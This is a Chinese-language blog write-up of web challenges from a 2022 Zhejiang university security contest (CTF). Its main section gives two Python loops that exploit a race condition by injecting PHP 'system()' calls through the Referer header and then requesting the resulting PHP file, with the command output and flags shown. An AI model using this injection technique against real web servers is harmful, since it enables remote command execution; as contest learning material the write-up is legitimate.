第五届浙江省大学生网络与信息安全竞赛-技能挑战赛Web Writeup
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛Web Writeup
ek1ng
发布于 2022-09-29 11:34:04
发布于 2022-09-29 11:34:04
文章被收录于专栏:ek1ng的技术小站
买买买01
条件竞争,当时没思考清楚的问题是,我知道通过条件竞争可以短时间的在系统上有一个.txt.php文件,但是没想明白怎么去让这个php文件被解析,因为file_get_contents这个函数只能读取文件内容但是却不会解析。其实只要直接访问就行。。。。
多线程也行,同时运行俩python文件也行。
import requests
while 1:
response = requests.get(
"http://1.14.97.218:21715/e7a1b1b1e092b53be5fa11394bbed8fb/e7a1b1b1e092b53be5fa11394bbed8fb.txt2.php")
if response.status_code != 404:
print(response.text)import requests
while 1:
# res = requests.get("http://1.14.97.218:21715/index.php?action=copy", headers={"referer": "<?php system('ls /');?>"})
res = requests.get("http://1.14.97.218:21715/index.php?action=copy", headers={"referer": "<?php system('cat /fla444444444444g');?>"})
# print(res.text)
competebin
boot
dev
etc
fla444444444444g
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
varcompeteDASCTF{43378609768205435621416258245141}nisc_easyweb
这个电脑没装扫描器省赛又不让上网。。。。所以根本就没发现/robots.txt
纯傻逼题目。。。
http://1.14.97.218:27359/test_api.php?i=FlagInHere
DASCTF{84772015113998304475018439433695}js小游戏
f12一看index.js,base64解码就行
学生管理系统
注册账号就有Flag,可能是非预期吧
感觉预赛的时候有点手忙脚乱,继续沉淀。
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月17日,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
